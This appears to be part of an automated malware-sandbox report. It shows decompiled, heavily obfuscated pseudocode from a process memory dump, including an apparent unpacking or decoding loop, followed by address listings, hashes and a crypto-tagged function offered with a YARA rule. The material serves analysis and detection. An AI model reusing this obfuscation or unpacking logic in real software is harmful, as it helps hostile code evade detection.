				 *(_t598 - 0x1c) = __edi;
				 *(__ebx + 0x41cd5b) =  *(__ebx + 0x41cd5b) & 0x00000000;
				 *(__ebx + 0x41cd5b) =  *(__ebx + 0x41cd5b) ^ (__edi -  *(_t598 - 0x1c) | _t346);
				_t559 =  *(_t598 - 0x1c);
				_t609 = _t608 - 0xfffffffc;
				 *(_t598 - 0x1c) = 0;
				_push( *(_t598 - 0x1c));
				 *_t609 =  *_t609 |  *_t608;
				_push( *(_t598 - 0x1c));
				 *_t609 = __ebx + 0x41c0d0;
				 *(_t598 - 0x20) =  *(_t598 - 0x20) & 0x00000000;
				_push( *(_t598 - 0x20));
				 *_t609 =  *_t609 | __ebx + 0x0041c99a;
				_t351 =  *((intOrPtr*)(__ebx + 0x41f068))();
				 *(_t598 - 0x20) = __ecx;
				 *(__ebx + 0x41c6ff) = 0 ^ _t351;
				_t352 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_push( *(_t598 - 0x1c));
				 *_t609 = _t352;
				_push(__edx);
				 *_t609 =  *_t609 ^ __edx;
				 *_t609 =  *_t609 ^ __ebx + 0x0041d1ce;
				 *(_t598 - 0x20) = 0;
				_push( *(_t598 - 0x20));
				 *_t609 =  *_t609 ^ __ebx + 0x0041c36e;
				_t355 =  *((intOrPtr*)(__ebx + 0x41f068))();
				 *(_t598 - 0x24) = __edx;
				 *(__ebx + 0x41c65d) = 0 ^ _t355;
				_t510 =  *(_t598 - 0x24);
				_t610 = _t609 - 0xfffffffc;
				 *(__ebx + 0x41c125) =  *(__ebx + 0x41c125) & 0x00000000;
				 *(__ebx + 0x41c125) =  *(__ebx + 0x41c125) | _t510 -  *_t610 ^ (_t355 & 0x00000000) +  *_t609;
				_t513 = _t510;
				_push(_t513);
				 *_t610 =  *_t610 & 0x00000000;
				 *_t610 =  *_t610 ^ __ebx + 0x0041c369;
				_t359 =  *((intOrPtr*)(__ebx + 0x41f060))();
				 *(_t598 - 0x24) = 0;
				_push( *(_t598 - 0x24));
				 *_t610 =  *_t610 + _t359;
				 *(_t598 - 0x24) = 0;
				_push( *(_t598 - 0x24));
				 *_t610 =  *_t610 ^ __ebx + 0x0041c4d6;
				_t361 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_t611 = _t610 - 0xfffffffc;
				 *_t611 =  *_t611 | _t513;
				_t514 = _t361;
				_t362 = _t514 + ( *(_t598 - 0x20) & 0x00000000 |  *_t610);
				_t516 = 0;
				 *_t611 = _t516;
				_t471 = 0 ^  *(__ebx + 0x41c434);
				_t519 = 0;
				if(_t471 > _t362) {
					_push(_t471);
					 *_t611 =  *_t611 ^ _t471;
					 *_t611 =  *_t611 + __ebx + 0x41c369;
					 *(_t598 - 0x1c) = 0;
					_push( *(_t598 - 0x1c));
					 *_t611 =  *_t611 ^ __ebx + 0x0041c4d6;
					_t362 =  *((intOrPtr*)(__ebx + 0x41f064))();
				}
				 *(_t454 + 0x41c391) =  *(_t454 + 0x41c391) & 0x00000000;
				 *(_t454 + 0x41c391) =  *(_t454 + 0x41c391) ^ _t598 ^  *_t611 ^ _t362;
				_t601 = _t598;
				if( *((intOrPtr*)(_t601 - 0x10)) != 2) {
					if( *((intOrPtr*)(_t601 - 0x10)) == 4) {
						_t156 = _t454 + 0x41d1be; // 0x41d1be
						 *_t611 = _t156;
						_t158 = _t454 + 0x41c0a8; // 0x41c0a8
						 *_t611 =  *_t611 & 0x00000000;
						 *_t611 =  *_t611 ^ _t158;
						_push( *((intOrPtr*)(_t454 + 0x41f068))(_t585,  *(_t601 - 0x24)));
						_pop( *_t160);
						_push( *(_t601 - 0x20));
						_pop( *_t162);
						 *((intOrPtr*)(_t601 - 8)) = 1;
						_t164 = _t454 + 0x41c6f8; // 0x41c6f8
						 *(_t601 - 0x20) =  *(_t601 - 0x20) & 0x00000000;
						 *_t611 =  *_t611 ^ _t164;
						_t408 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x20));
						 *(_t601 - 0x20) = _t519;
						 *(_t454 + 0x41c674) =  *(_t454 + 0x41c674) & 0x00000000;
						 *(_t454 + 0x41c674) =  *(_t454 + 0x41c674) | _t519 ^  *(_t601 - 0x20) | _t408;
						_t548 =  *(_t601 - 0x20);
						 *((intOrPtr*)(_t601 - 0xc)) = 0x55;
						_t177 = _t454 + 0x41c356; // 0x41c356
						 *(_t601 - 0x1c) =  *(_t601 - 0x1c) & 0x00000000;
						 *_t611 =  *_t611 | _t177;
						_t410 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x1c));
						 *(_t601 - 0x24) = _t559;
						 *(_t454 + 0x41cd7d) =  *(_t454 + 0x41cd7d) & 0x00000000;
						 *(_t454 + 0x41cd7d) =  *(_t454 + 0x41cd7d) | _t559 & 0x00000000 ^ _t410;
						_t559 =  *(_t601 - 0x24);
						 *((intOrPtr*)(_t601 - 0x18)) = 2;
						_t189 = _t454 + 0x41cc3e; // 0x41cc3e
						 *(_t601 - 0x24) =  *(_t601 - 0x24) & 0x00000000;
						 *_t611 =  *_t611 ^ _t189;
						_t193 = _t454 + 0x41cf5b; // 0x41cf5b
						 *_t611 =  *_t611 ^ _t585;
						 *_t611 = _t193;
						_t362 =  *((intOrPtr*)(_t454 + 0x41f068))(_t585,  *(_t601 - 0x24));
						 *(_t601 - 0x20) = _t548;
						 *(_t454 + 0x41c1cd) =  *(_t454 + 0x41c1cd) & 0x00000000;
						 *(_t454 + 0x41c1cd) =  *(_t454 + 0x41c1cd) | _t548 & 0x00000000 | _t362;
						_t519 =  *(_t601 - 0x20);
					}
				} else {
					_t65 = _t454 + 0x41cb7a; // 0x41cb7a
					 *(_t601 - 0x1c) = 0;
					 *_t611 =  *_t611 + _t65;
					_t68 = _t454 + 0x41c8ec; // 0x41c8ec
					 *(_t601 - 0x24) = 0;
					 *_t611 =  *_t611 ^ _t68;
					_t415 =  *((intOrPtr*)(_t454 + 0x41f068))( *(_t601 - 0x24),  *(_t601 - 0x1c));
					 *(_t454 + 0x41c6f4) =  *(_t454 + 0x41c6f4) & 0x00000000;
					 *(_t454 + 0x41c6f4) =  *(_t454 + 0x41c6f4) ^ (_t585 & 0x00000000 | _t415);
					_t595 = _t585;
					_t76 = _t454 + 0x41c379; // 0x41c379
					 *(_t601 - 0x20) =  *(_t601 - 0x20) & 0x00000000;
					 *_t611 =  *_t611 + _t76;
					_t80 = _t454 + 0x41c532; // 0x41c532
					 *(_t601 - 0x20) =  *(_t601 - 0x20) & 0x00000000;
					 *_t611 =  *_t611 | _t80;
					_t418 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x20),  *(_t601 - 0x20));
					 *_t611 = _t418;
					_t86 = _t454 + 0x41d201; // 0x41d201
					 *_t611 = _t86;
					_t420 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x20),  *(_t601 - 0x24));
					_t498 = _t471 & 0x00000000 |  *_t611;
					_t621 =  &(_t611[1]);
					 *_t621 =  *_t621 + _t559;
					_t577 = _t420;
					_t421 = _t577 + _t498;
					_t579 = 0;
					_t500 = _t498 & 0x00000000 ^ (_t421 ^  *_t621 |  *(_t454 + 0x41cc21));
					_t424 = _t421;
					if(_t500 > _t424) {
						_t90 = _t454 + 0x41c532; // 0x41c532
						 *_t621 =  *_t621 & 0x00000000;
						 *_t621 =  *_t621 | _t90;
						_t91 = _t454 + 0x41d201; // 0x41d201
						 *(_t601 - 0x24) =  *(_t601 - 0x24) & 0x00000000;
						 *_t621 =  *_t621 | _t91;
						_t451 =  *((intOrPtr*)(_t454 + 0x41f064))( *(_t601 - 0x24), _t519);
						 *(_t454 + 0x41d32e) =  *(_t454 + 0x41d32e) & 0x00000000;
						 *(_t454 + 0x41d32e) =  *(_t454 + 0x41d32e) | _t601 -  *_t621 ^ _t451;
						_t601 = _t601;
					}
					_t622 = _t621 - 0xfffffffc;
					 *_t622 =  *_t622 & 0x00000000;
					 *_t622 =  *_t622 |  *_t621;
					_t100 = _t454 + 0x41d01d; // 0x41d01d
					 *_t622 =  *_t622 ^ _t579;
					 *_t622 =  *_t622 | _t100;
					_t101 = _t454 + 0x41c37d; // 0x41c37d
					 *_t622 = _t101;
					_t429 =  *((intOrPtr*)(_t454 + 0x41f068))( *(_t601 - 0x1c), _t579, _t519);
					 *(_t601 - 0x20) = _t579;
					 *(_t454 + 0x41c9dc) =  *(_t454 + 0x41c9dc) & 0x00000000;
					 *(_t454 + 0x41c9dc) =  *(_t454 + 0x41c9dc) | _t579 & 0x00000000 | _t429;
					_t582 =  *(_t601 - 0x20);
					_t430 =  *((intOrPtr*)(_t454 + 0x41f060))();
					 *_t622 =  *_t622 ^ _t595;
					 *_t622 =  *_t622 | _t430;
					_t111 = _t454 + 0x41c8c2; // 0x41c8c2
					 *_t622 =  *_t622 - _t454;
					 *_t622 =  *_t622 + _t111;
					_t112 = _t454 + 0x41c737; // 0x41c737
					 *_t622 =  *_t622 & 0x00000000;
					 *_t622 =  *_t622 ^ _t112;
					_t433 =  *((intOrPtr*)(_t454 + 0x41f068))(_t582, _t454, _t595);
					 *_t114 = _t433;
					_push( *(_t601 - 0x20));
					_pop( *_t116);
					_t623 = _t622 - 0xfffffffc;
					 *(_t601 - 0x20) = _t582;
					 *(_t454 + 0x41c606) = _t433 & 0x00000000 |  *_t622;
					_t559 =  *(_t601 - 0x20);
					 *((intOrPtr*)(_t601 - 8)) = 3;
					_t121 = _t454 + 0x41d2fe; // 0x41d2fe
					 *(_t601 - 0x1c) = 0;
					 *_t623 =  *_t623 | _t121;
					_t437 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x1c));
					 *_t623 =  *_t623 ^ _t559;
					 *_t623 =  *_t623 + _t437;
					_t125 = _t454 + 0x41d22a; // 0x41d22a
					 *(_t601 - 0x24) =  *(_t601 - 0x24) & 0x00000000;
					 *_t623 =  *_t623 | _t125;
					_t439 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x24), _t559);
					_t502 = _t500 & 0x00000000 |  *_t623;
					_t611 =  &(_t623[1]);
					 *(_t601 - 0x24) = _t519;
					_push(_t502 + _t439);
					_t553 =  *(_t601 - 0x24);
					_pop(_t440);
					 *(_t601 - 0x20) = _t440;
					_t504 = _t502 & 0x00000000 ^ (_t440 ^  *(_t601 - 0x20) |  *(_t454 + 0x41c48f));
					_t443 =  *(_t601 - 0x20);
					if(_t504 > _t443) {
						_t136 = _t454 + 0x41d2fe; // 0x41d2fe
						 *(_t601 - 0x24) =  *(_t601 - 0x24) & 0x00000000;
						 *_t611 =  *_t611 + _t136;
						_t140 = _t454 + 0x41d22a; // 0x41d22a
						 *(_t601 - 0x20) = 0;
						 *_t611 =  *_t611 ^ _t140;
						_t443 =  *((intOrPtr*)(_t454 + 0x41f064))( *(_t601 - 0x20),  *(_t601 - 0x24));
					}
					 *_t611 = _t595;
					 *(_t454 + 0x41c2cf) = 0 ^ _t443;
					_t585 = 0;
					 *((intOrPtr*)(_t601 - 0xc)) = 0x11;
					_t146 = _t454 + 0x41d09f; // 0x41d09f
					 *_t611 =  *_t611 - _t559;
					 *_t611 =  *_t611 + _t146;
					_t445 =  *((intOrPtr*)(_t454 + 0x41f060))(_t559);
					 *(_t601 - 0x24) = _t504;
					 *((intOrPtr*)(_t454 + 0x41ce4e)) = _t445;
					_t471 =  *(_t601 - 0x24);
					 *((intOrPtr*)(_t601 - 0x18)) = 4;
					_t152 = _t454 + 0x41c4f7; // 0x41c4f7
					 *_t611 =  *_t611 ^ _t471;
					 *_t611 =  *_t611 + _t152;
					_t362 =  *((intOrPtr*)(_t454 + 0x41f060))(_t471);
					 *_t611 = _t553;
					 *(_t454 + 0x41c895) = 0 ^ _t362;
					_t519 = 0;
				}
				_t520 = _t519 ^ _t519;
				 *_t611 =  *_t611 - _t559;
				 *_t611 = _t520;
				_t201 = _t454 + 0x41c61d; // 0x41c61d
				 *_t611 =  *_t611 ^ _t585;
				 *_t611 = _t201;
				_t367 =  *((intOrPtr*)(_t454 + 0x41f060))(_t585, _t559, _t362);
				 *_t611 = _t367;
				_t204 = _t454 + 0x41cf67; // 0x41cf67
				 *(_t601 - 0x24) = 0;
				 *_t611 =  *_t611 ^ _t204;
				_t369 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x24),  *(_t601 - 0x1c));
				_pop( *_t208);
				_t473 = _t471 & 0x00000000 ^  *(_t601 - 0x24);
				 *(_t601 - 0x24) = _t559;
				_push(_t473 + _t369);
				_t562 =  *(_t601 - 0x24);
				_pop(_t370);
				_t475 = _t473 & 0x00000000 | _t601 & 0x00000000 ^  *(_t454 + 0x41c5dc);
				_t604 = _t601;
				if(_t475 > _t370) {
					_t213 = _t454 + 0x41c61d; // 0x41c61d
					 *(_t604 - 0x1c) = 0;
					 *_t611 =  *_t611 ^ _t213;
					_t216 = _t454 + 0x41cf67; // 0x41cf67
					 *(_t604 - 0x20) = 0;
					 *_t611 =  *_t611 | _t216;
					_t403 =  *((intOrPtr*)(_t454 + 0x41f064))( *(_t604 - 0x20),  *(_t604 - 0x1c));
					 *(_t604 - 0x1c) = _t475;
					 *((intOrPtr*)(_t454 + 0x41cf4f)) = _t403;
					_t475 =  *(_t604 - 0x1c);
				}
				_t612 =  &(_t611[1]);
				 *_t612 = _t475;
				_t478 = 0;
				 *_t612 = _t520 & 0x00000000 |  *_t611;
				_t225 = _t454 + 0x41cef6; // 0x41cef6
				 *(_t604 - 0x1c) =  *(_t604 - 0x1c) & 0x00000000;
				 *_t612 =  *_t612 | _t225;
				_t229 = _t454 + 0x41ceb9; // 0x41ceb9
				 *_t612 =  *_t612 ^ _t604;
				 *_t612 =  *_t612 ^ _t229;
				_t374 =  *((intOrPtr*)(_t454 + 0x41f068))(_t604,  *(_t604 - 0x1c),  *(_t604 - 0x24));
				 *(_t454 + 0x41caf5) =  *(_t454 + 0x41caf5) & 0x00000000;
				 *(_t454 + 0x41caf5) =  *(_t454 + 0x41caf5) | _t478 ^  *_t612 | _t374;
				_t481 = _t478;
				_t613 = _t612 - 0xfffffffc;
				_t525 = _t374 %  *(_t604 - 0x18);
				 *_t613 =  *_t613 & 0x00000000;
				 *_t613 =  *_t613 | _t525;
				_t241 = _t454 + 0x41c52d; // 0x41c52d
				 *(_t604 - 0x24) = 0;
				 *_t613 =  *_t613 ^ _t241;
				_t377 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t604 - 0x24), _t481);
				 *(_t454 + 0x41d106) =  *(_t454 + 0x41d106) & 0x00000000;
				 *(_t454 + 0x41d106) =  *(_t454 + 0x41d106) | _t525 & 0x00000000 | _t377;
				_t528 = _t525;
				_t530 = _t528 & 0x00000000 ^  *_t613;
				_t614 = _t613 - 0xfffffffc;
				 *((intOrPtr*)(_t604 - 4)) =  *((intOrPtr*)(_t604 - 4)) - _t530;
				 *(_t604 - 0x24) = 0;
				 *_t614 =  *_t614 | _t530;
				_t253 = _t454 + 0x41c7ee; // 0x41c7ee
				 *_t614 =  *_t614 ^ _t562;
				 *_t614 =  *_t614 ^ _t253;
				_t254 = _t454 + 0x41c513; // 0x41c513
				 *(_t604 - 0x20) = 0;
				 *_t614 =  *_t614 | _t254;
				_t380 =  *((intOrPtr*)(_t454 + 0x41f068))( *(_t604 - 0x20), _t562,  *(_t604 - 0x24), _t481);
				 *(_t604 - 0x20) = _t585;
				 *(_t454 + 0x41c2a8) =  *(_t454 + 0x41c2a8) & 0x00000000;
				 *(_t454 + 0x41c2a8) =  *(_t454 + 0x41c2a8) ^ _t585 & 0x00000000 ^ _t380;
				_t532 =  *_t614;
				_t615 =  &(_t614[1]);
				 *(_t604 - 0x1c) = _t380;
				 *(_t604 - 0x14) =  *(_t604 - 0x14) & 0x00000000;
				 *(_t604 - 0x14) =  *(_t604 - 0x14) | _t380 ^  *(_t604 - 0x1c) ^ _t532;
				_t271 = _t454 + 0x41ccc7; // 0x41ccc7
				 *(_t604 - 0x24) = 0;
				 *_t615 =  *_t615 | _t271;
				_t385 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t604 - 0x24));
				 *(_t454 + 0x41cca4) =  *(_t454 + 0x41cca4) & 0x00000000;
				 *(_t454 + 0x41cca4) =  *(_t454 + 0x41cca4) | _t562 -  *_t615 | _t385;
				_t565 = _t562;
				_t590 =  *(_t604 - 0x20) & 0x00000000 ^ _t454 & 0x00000000 ^  *(_t604 + 8);
				_t457 = _t454;
				_t280 = _t457 + 0x41c550; // 0x41c550
				 *(_t604 - 0x20) = 0;
				 *_t615 =  *_t615 + _t280;
				_t387 =  *((intOrPtr*)(_t457 + 0x41f060))( *(_t604 - 0x20));
				 *(_t604 - 0x20) = 0;
				 *_t615 =  *_t615 + _t387;
				_t286 = _t457 + 0x41d34c; // 0x41d34c
				 *_t615 = _t286;
				_t389 =  *((intOrPtr*)(_t457 + 0x41f060))( *(_t604 - 0x20),  *(_t604 - 0x20));
				_t616 = _t615 - 0xfffffffc;
				 *_t289 = _t389;
				 *(_t604 - 0x24) =  *(_t604 - 0x24) + (0 ^  *_t615);
				_push( *(_t604 - 0x24));
				_pop(_t390);
				_t534 = _t532;
				 *(_t604 - 0x1c) = _t534;
				_t537 =  *(_t604 - 0x1c);
				if( *((intOrPtr*)(_t457 + 0x41ccf8)) > _t390) {
					_t296 = _t457 + 0x41c550; // 0x41c550
					 *(_t604 - 0x1c) =  *(_t604 - 0x1c) & 0x00000000;
					 *_t616 =  *_t616 + _t296;
					_t300 = _t457 + 0x41d34c; // 0x41d34c
					 *(_t604 - 0x1c) =  *(_t604 - 0x1c) & 0x00000000;
					 *_t616 =  *_t616 + _t300;
					_t390 =  *((intOrPtr*)(_t457 + 0x41f064))( *(_t604 - 0x1c),  *(_t604 - 0x1c));
				}
				 *(_t604 - 0x24) = _t537;
				 *((intOrPtr*)(_t457 + 0x41ce46)) = _t390;
				_t540 =  *(_t604 - 0x24);
				 *(_t604 - 0x1c) = _t540;
				_t310 = _t457 + 0x41cb9d; // 0x41cb9d
				 *_t616 =  *_t616 - _t590;
				 *_t616 =  *_t616 | _t310;
				_t311 = _t457 + 0x41cd17; // 0x41cd17
				 *(_t604 - 0x20) =  *(_t604 - 0x20) & 0x00000000;
				 *_t616 =  *_t616 | _t311;
				_t393 =  *((intOrPtr*)(_t457 + 0x41f068))( *(_t604 - 0x20), _t590);
				 *_t616 = _t565 & 0x00000000 | _t540 & 0x00000000 ^ _t590;
				 *(_t457 + 0x41d015) = 0 ^ _t393;
				_t570 = 0;
				_t591 = _t590 - 1;
				 *(_t604 - 0x1c) = 0;
				_push( *(_t604 - 0x1c));
				 *_t616 =  *_t616 | _t457;
				do {
					 *_t319 = _t570;
					_t488 =  *(_t604 - 0x20);
					_t489 = _t488 &  *(_t604 - 8);
					if(_t489 == 0) {
						_t591 = _t591 + 1;
						_t393 = _t393 & 0x00000000 ^ (_t570 -  *_t616 |  *(_t604 - 0x18));
						_t570 = _t570;
						_t457 =  *(_t393 + _t591) & 0x000000ff;
					}
					 *_t325 =  *((intOrPtr*)(_t604 - 0xc));
					_t544 =  *(_t604 - 0x20);
					asm("rol edx, cl");
					asm("lodsb");
					_t393 = _t393 | _t544 & _t457;
					 *_t570 = _t393;
					_t570 = _t570 + 1;
					_t327 = _t604 - 4;
					 *_t327 =  *((intOrPtr*)(_t604 - 4)) - 1;
				} while ( *_t327 != 0);
				_t459 =  *_t616;
				_t617 =  &(_t616[1]);
				_t329 = _t459 + 0x41cc0b; // 0x41cc0b
				 *_t617 =  *_t617 & 0x00000000;
				 *_t617 =  *_t617 ^ _t329;
				_t330 = _t459 + 0x41cbd0; // 0x41cbd0
				 *_t617 =  *_t617 & 0x00000000;
				 *_t617 =  *_t617 | _t330;
				_t397 =  *((intOrPtr*)(_t459 + 0x41f068))(_t604, _t489);
				 *(_t604 - 0x20) = _t489;
				 *(_t459 + 0x41d326) =  *(_t459 + 0x41d326) & 0x00000000;
				 *(_t459 + 0x41d326) =  *(_t459 + 0x41d326) ^ (_t489 ^  *(_t604 - 0x20) | _t397);
				 *(_t604 - 0x1c) = _t459;
				return memcpy(_t570, _t591 + 1,  *(_t604 - 0x14));
			}

0x03333fab
0x03333fab
0x03333fb1
0x03333fb5
0x03333fb8
0x03333fc1
0x03333fc2
0x03333fc5
0x03333fc8
0x03333fd4
0x03333fd5
0x03333fd9
0x03333fe2
0x03333fe5
0x03333fe8
0x03333fee
0x03333ff6
0x03333ffd
0x03334003
0x0333400b
0x0333400e
0x03334015
0x03334018
0x03334021
0x03334024
0x0333402d
0x03334031
0x03334034
0x03334037
0x0333403d
0x03334044
0x0333404d
0x03334053
0x03334056
0x0333405f
0x03334060
0x03334063
0x0333406c
0x03334073
0x03334076
0x03334079
0x0333407f
0x03334086
0x0333408c
0x03334098
0x033340a1
0x033340a8
0x033340ae
0x033340b5
0x033340b6
0x033340ba
0x033340bd
0x033340c3
0x033340ca
0x033340cd
0x033340d6
0x033340dd
0x033340e0
0x033340e3
0x033340f2
0x033340f7
0x033340fb
0x033340fe
0x03334100
0x03334103
0x0333410e
0x03334110
0x03334113
0x0333411b
0x0333411c
0x0333411f
0x03334128
0x0333412f
0x03334132
0x03334135
0x03334135
0x03334141
0x03334148
0x0333414e
0x03334153
0x0333446d
0x03334473
0x0333447c
0x0333447f
0x03334486
0x0333448a
0x03334493
0x03334494
0x03334497
0x0333449a
0x033344a0
0x033344a7
0x033344ad
0x033344b4
0x033344b7
0x033344bd
0x033344c5
0x033344cc
0x033344d2
0x033344d5
0x033344dc
0x033344e2
0x033344e9
0x033344ec
0x033344f2
0x033344fa
0x03334501
0x03334507
0x0333450a
0x03334511
0x03334517
0x0333451e
0x03334521
0x03334528
0x0333452b
0x0333452e
0x03334534
0x0333453c
0x03334543
0x03334549
0x03334549
0x03334159
0x03334159
0x0333415f
0x03334169
0x0333416c
0x03334172
0x0333417c
0x0333417f
0x0333418b
0x03334192
0x03334198
0x03334199
0x0333419f
0x033341a6
0x033341a9
0x033341af
0x033341b6
0x033341b9
0x033341c2
0x033341c5
0x033341ce
0x033341d1
0x033341dd
0x033341e0
0x033341e5
0x033341e9
0x033341ec
0x033341ee
0x033341fc
0x033341fe
0x03334201
0x03334203
0x0333420a
0x0333420e
0x03334211
0x03334217
0x0333421e
0x03334221
0x0333422d
0x03334234
0x0333423a
0x0333423a
0x03334240
0x03334244
0x03334248
0x0333424b
0x03334252
0x03334255
0x03334258
0x03334261
0x03334264
0x0333426a
0x03334272
0x03334279
0x0333427f
0x03334282
0x03334289
0x0333428c
0x0333428f
0x03334296
0x03334299
0x0333429c
0x033342a3
0x033342a7
0x033342aa
0x033342b1
0x033342b4
0x033342b7
0x033342c6
0x033342c9
0x033342d0
0x033342d6
0x033342d9
0x033342e0
0x033342e6
0x033342f0
0x033342f3
0x033342fa
0x033342fd
0x03334300
0x03334306
0x0333430d
0x03334310
0x0333431c
0x0333431f
0x03334322
0x03334329
0x0333432a
0x0333432d
0x0333432e
0x0333433d
0x0333433f
0x03334344
0x03334346
0x0333434c
0x03334353
0x03334356
0x0333435c
0x03334366
0x03334369
0x03334369
0x03334371
0x03334378
0x0333437e
0x0333437f
0x03334386
0x0333438d
0x03334390
0x03334393
0x03334399
0x033343a0
0x033343a6
0x033343a9
0x033343b0
0x033343b7
0x033343ba
0x033343bd
0x033343c5
0x033343cc
0x033343d2
0x033343d2
0x03334551
0x03334555
0x03334558
0x0333455b
0x03334562
0x03334565
0x03334568
0x03334571
0x03334574
0x0333457a
0x03334584
0x03334587
0x03334593
0x03334596
0x03334599
0x033345a0
0x033345a1
0x033345a4
0x033345b2
0x033345b4
0x033345b7
0x033345b9
0x033345bf
0x033345c9
0x033345cc
0x033345d2
0x033345dc
0x033345df
0x033345e5
0x033345ec
0x033345f2
0x033345f2
0x033345fe
0x03334603
0x0333460d
0x03334611
0x03334614
0x0333461a
0x03334621
0x03334624
0x0333462b
0x0333462e
0x03334631
0x0333463d
0x03334644
0x0333464a
0x03334654
0x03334657
0x0333465b
0x0333465f
0x03334662
0x03334668
0x03334672
0x03334675
0x03334681
0x03334688
0x0333468e
0x03334695
0x03334698
0x033346a1
0x033346a5
0x033346af
0x033346b2
0x033346b9
0x033346bc
0x033346bf
0x033346c5
0x033346cf
0x033346d2
0x033346d8
0x033346e0
0x033346e7
0x033346f2
0x033346f5
0x033346f8
0x03334700
0x03334704
0x0333470a
0x03334710
0x0333471a
0x0333471d
0x03334729
0x03334730
0x03334736
0x03334741
0x03334743
0x03334744
0x0333474a
0x03334754
0x03334757
0x0333475d
0x03334767
0x0333476a
0x03334773
0x03334776
0x03334781
0x03334788
0x0333478b
0x0333478e
0x03334791
0x03334792
0x03334793
0x033347a0
0x033347a5
0x033347a7
0x033347ad
0x033347b4
0x033347b7
0x033347bd
0x033347c4
0x033347c7
0x033347c7
0x033347cd
0x033347d4
0x033347da
0x033347dd
0x033347ed
0x033347f4
0x033347f7
0x033347fa
0x03334800
0x03334807
0x0333480a
0x03334812
0x03334819
0x0333481f
0x03334820
0x03334821
0x03334828
0x0333482b
0x0333482e
0x0333482f
0x03334835
0x03334836
0x03334839
0x0333483b
0x03334846
0x03334848
0x03334849
0x03334849
0x03334850
0x03334856
0x03334857
0x0333485b
0x0333485c
0x0333485e
0x03334860
0x03334861
0x03334861
0x03334861
0x03334868
0x0333486b
0x0333486e
0x03334875
0x03334879
0x0333487c
0x03334883
0x03334887
0x0333488a
0x03334890
0x03334898
0x0333489f
0x033348a8
0x033348c1

Memory Dump Source

Source File: 00000002.00000002.275244228.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e380f32c42c4f0e1bdcf2094019efc4a4f59e296a005b21612e1bc21532986cf
Instruction ID: 8eb4fbec9a85d240d83d903b536e126b49932ee3b47cff83a7a11ce93f371428
Opcode Fuzzy Hash: e380f32c42c4f0e1bdcf2094019efc4a4f59e296a005b21612e1bc21532986cf
Instruction Fuzzy Hash: D04234728442088FEF04DFA4C88A7EEBBF1FF48310F19856ED889AA155D7385525CF69

Uniqueness

Uniqueness Score: -1.00%

Function 03331CD0, Relevance: .6, Instructions: 565
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E03331CD0(void* __ebx, signed int __ecx, signed int __edx, signed int __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t326;
				signed int _t329;
				void* _t331;
				void* _t332;
				signed int _t336;
				signed int _t339;
				signed int _t344;
				signed int _t345;
				signed int _t348;
				intOrPtr _t353;
				signed int _t356;
				signed int _t359;
				void* _t361;
				void* _t362;
				signed int _t367;
				signed int _t368;
				signed int _t370;
				void* _t372;
				void* _t373;
				void* _t377;
				intOrPtr _t378;
				intOrPtr _t380;
				signed int _t382;
				signed int _t385;
				signed int _t387;
				void* _t389;
				signed int _t390;
				signed int _t392;
				signed int _t395;
				void* _t397;
				void* _t399;
				signed int _t400;
				signed int _t415;
				signed int _t418;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t427;
				signed int _t431;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t444;
				signed int _t446;
				signed int _t453;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t461;
				signed int _t467;
				signed int _t470;
				signed int _t476;
				signed int _t479;
				signed int _t482;
				signed int _t485;
				void* _t489;
				signed int _t491;
				signed int _t494;
				signed int _t497;
				signed int _t499;
				signed int _t502;
				signed int _t504;
				signed int _t507;
				signed int _t510;
				signed int _t513;
				void* _t516;
				signed int _t518;
				signed int _t529;
				signed int _t532;
				signed int _t535;
				signed int _t537;
				signed int _t540;
				signed int _t543;
				signed int _t546;
				signed int _t549;
				signed int _t552;
				void* _t561;
				void* _t565;
				signed int _t566;
				void* _t569;
				signed int _t572;
				signed int _t576;
				signed int* _t577;
				signed int* _t578;
				signed int* _t579;
				signed int* _t580;
				signed int* _t581;
				signed int* _t582;
				signed int* _t583;

				_t467 = __edx;
				_t422 = __ebx;
				_push(__esi);
				 *_t576 =  *_t576 & 0x00000000;
				 *_t576 =  *_t576 + _t565;
				_t566 = _t576;
				_t577 = _t576 + 0xfffffff0;
				_v20 = 0;
				_push(_v20);
				 *_t577 =  *_t577 + __ebx + 0x41d081;
				_t326 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_push(__esi);
				 *(__ebx + 0x41d148) =  *(__ebx + 0x41d148) & 0x00000000;
				 *(__ebx + 0x41d148) =  *(__ebx + 0x41d148) | __esi -  *_t577 ^ _t326;
				_pop(_t529);
				_push(__ebx);
				 *_t577 =  *_t577 & 0x00000000;
				 *_t577 =  *_t577 + __ebx + 0x41c850;
				_push(_v16);
				 *_t577 = __ebx + 0x41cbc9;
				_t329 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_push(__ebx);
				 *_t577 =  *_t577 - __ebx;
				 *_t577 = _t329;
				_push(__edi);
				 *_t577 =  *_t577 ^ __edi;
				 *_t577 =  *_t577 + __ebx + 0x41cab2;
				_t331 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_pop( *_t15);
				_push(__edi);
				 *_t17 = _t331;
				_v12 = _v12 + (__ecx & 0x00000000 | _v20);
				_push(_v12);
				_pop(_t332);
				_pop(_t497);
				_push( *((intOrPtr*)(__ebx + 0x41ca2b)));
				_pop( *_t22);
				_push(_v16);
				_pop(_t431);
				if(_t431 > _t332) {
					_v20 = 0;
					_push(_v20);
					 *_t577 =  *_t577 + __ebx + 0x41cbc9;
					_push(_v20);
					 *_t577 = __ebx + 0x41cab2;
					_t421 =  *((intOrPtr*)(__ebx + 0x41f064))();
					_v20 = _t431;
